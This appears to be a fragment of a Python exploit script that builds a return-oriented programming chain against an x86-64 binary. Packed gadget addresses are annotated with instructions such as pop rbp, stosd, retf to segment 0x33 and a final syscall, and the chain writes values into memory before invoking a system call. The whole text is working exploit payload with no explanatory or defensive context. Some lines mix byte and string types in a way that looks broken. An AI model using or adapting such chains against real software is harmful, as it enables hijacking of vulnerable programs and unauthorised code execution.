payload = p64(0x4011ad)
#0x00000000004011ad: pop rbp; ret; 
payload += p64(0x6e69723f)+p64(0x419a9a)
# 0x0000000000419a9a: pop rdx; ret 9; 
payload += p64(0x41425c)+p64(0x4810ef)+p64(0x0)+"\x00"*1
# 0x00000000004810ef: lea eax, [rbp - 0x1010]; mov rdi, rax; call rdx; 
payload += b''
# 0x000000000041425c: pop rcx; ret; 
payload += p64(0x424b6c)
# 0x424b6c: pop rdi ; retf 5
payload += p64(0x4ca058)+p32(0x43e619)+p32(0x33)+"\x00"*5
# 0x000000000043e619: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x68763f)+p64(0x419a9a)
# 0x0000000000419a9a: pop rdx; ret 9; 
payload += p64(0x41425c)+p64(0x4810ef)+p64(0x0)+"\x00"*1
# 0x00000000004810ef: lea eax, [rbp - 0x1010]; mov rdi, rax; call rdx; 
payload += b''
# 0x000000000041425c: pop rcx; ret; 
payload += p64(0x424b6c)
# 0x424b6c: pop rdi ; retf 5
payload += p64(0x4ca05c)+p32(0x43e619)+p32(0x33)+"\x00"*5
# 0x000000000043e619: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x4cb210)+p64(0x419a9a)
# 0x0000000000419a9a: pop rdx; ret 9; 
payload += p64(0x41425c)+p64(0x4810ef)+p64(0x0)+"\x00"*1
# 0x00000000004810ef: lea eax, [rbp - 0x1010]; mov rdi, rax; call rdx; 
payload += b''
# 0x000000000041425c: pop rcx; ret; 
payload += p64(0x4b0295)
# 0x00000000004b0295: pop rsi; add byte ptr [rax], al; ret; 
payload += p64(0x0)+p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x104b)+p64(0x419a9a)
# 0x0000000000419a9a: pop rdx; ret 9; 
payload += p64(0x41425c)+p64(0x4810ef)+p64(0x0)+"\x00"*1
# 0x00000000004810ef: lea eax, [rbp - 0x1010]; mov rdi, rax; call rdx; 
payload += b''
# 0x000000000041425c: pop rcx; ret; 
payload += p64(0x419a9a)
# 0x0000000000419a9a: pop rdx; ret 9; 
payload += p64(0x0)+p64(0x424b6c)+p64(0x0)+"\x00"*1
# 0x424b6c: pop rdi ; retf 5
payload += p64(0x4ca058)+p32(0x4b8339)+p32(0x33)+"\x00"*5
# 0x00000000004b8339: syscall; 
payload += b''
